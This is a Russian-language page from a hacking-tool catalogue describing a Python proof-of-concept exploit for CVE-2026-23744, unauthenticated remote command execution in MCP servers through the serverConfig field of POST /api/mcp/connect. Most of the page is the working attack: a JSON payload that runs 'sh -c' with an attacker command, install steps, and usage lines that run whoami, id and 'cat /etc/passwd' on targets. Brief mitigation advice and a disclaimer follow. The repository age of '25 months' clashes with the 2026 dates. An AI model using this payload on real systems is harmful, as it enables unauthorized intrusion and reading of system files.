Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-23744-POC — Python PoC для CVE-2026-23744, неаутентифицированное RCE в MCP-серверах через поле команды serverConfig в /api/mcp/connect (порт по умолчанию 6274) | Kitploit
Инструменты/GitHubGitHub/d3vn0mi/cve-2026-23744-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubd3vn0mi/cve-2026-23744-poc

CVE-2026-23744-POC

Python PoC для CVE-2026-23744, неаутентифицированное RCE в MCP-серверах через поле команды serverConfig в /api/mcp/connect (порт по умолчанию 6274)

Репозиторий
25 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-23744 — Неаутентифицированное удалённое выполнение кода в MCP-сервере

Эксплойт Proof-of-Concept от d3vn0mi

Обзор

CVE-2026-23744 — это уязвимость неаутентифицированного удалённого выполнения кода (RCE) в MCP-совместимых серверах, доступных на порту 6274. Конечная точка /api/mcp/connect принимает объект serverConfig, который позволяет вызывающей стороне указать произвольную команду ОС и аргументы — без какой-либо проверки подлинности или авторизации.

Злоумышленник, имеющий сетевой доступ к сервису, может выполнять произвольные команды от имени пользователя, запустившего MCP-сервер.

ДетальЗначение
ID CVECVE-2026-23744
ТипНеаутентифицированное удалённое выполнение кода
Конечная точкаPOST /api/mcp/connect
Порт6274 (по умолчанию)
КритичностьКритическая

Уязвимая нагрузка

root@kitploit:~
{
  "serverConfig": {
    "command": "sh",
    "args": ["-c", "<ATTACKER_COMMAND>"],
    "env": {}
  },
  "serverId": "anything"
}

Сервер запускает указанную command с заданными args без санитизации или контроля доступа.

Установка

root@kitploit:~
git clone https://github.com/d3vn0mi/CVE-2026-23744-POC.git
cd CVE-2026-23744-POC
pip install -r requirements.txt

Использование

root@kitploit:~
# Базовое использование
python3 exploit.py -t <TARGET_IP> -c '<COMMAND>'

# Нестандартный порт
python3 exploit.py -t 192.168.1.10 -p 6274 -c 'id > /tmp/pwned.txt'

# Пропустить проверку доступности
python3 exploit.py -t 10.0.0.5 -c 'whoami' --no-check

# Пользовательский server ID
python3 exploit.py -t 127.0.0.1 -c 'cat /etc/passwd' -s my_server

Параметры

ФлагОписание
-t, --targetIP-адрес или имя хоста цели (обязательно)
-c, --commandКоманда ОС для выполнения (обязательно)
-p, --portПорт цели (по умолчанию: 6274)
-s, --server-idЗначение serverId в нагрузке
--timeoutТаймаут проверки в секундах (по умолчанию: 30)
--no-checkПропустить первоначальную проверку доступности

Устранение уязвимости

  • Не открывайте MCP-сервер для ненадёжных сетей.
  • Применяйте исправления от вендора, как только они станут доступны.
  • Ограничьте доступ к конечной точке /api/mcp/connect с помощью аутентификации и средств контроля на уровне сети.
  • Отслеживайте неожиданные запуски процессов от процесса MCP-сервера.

Отказ от ответственности

Этот инструмент предоставляется только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам является незаконным. Автор не несёт ответственности за неправомерное использование. Всегда получайте надлежащее разрешение перед тестированием.

Лицензия

Этот проект распространяется под лицензией MIT.

Автор

d3vn0mi — github.com/d3vn0mi

Скачать инструмент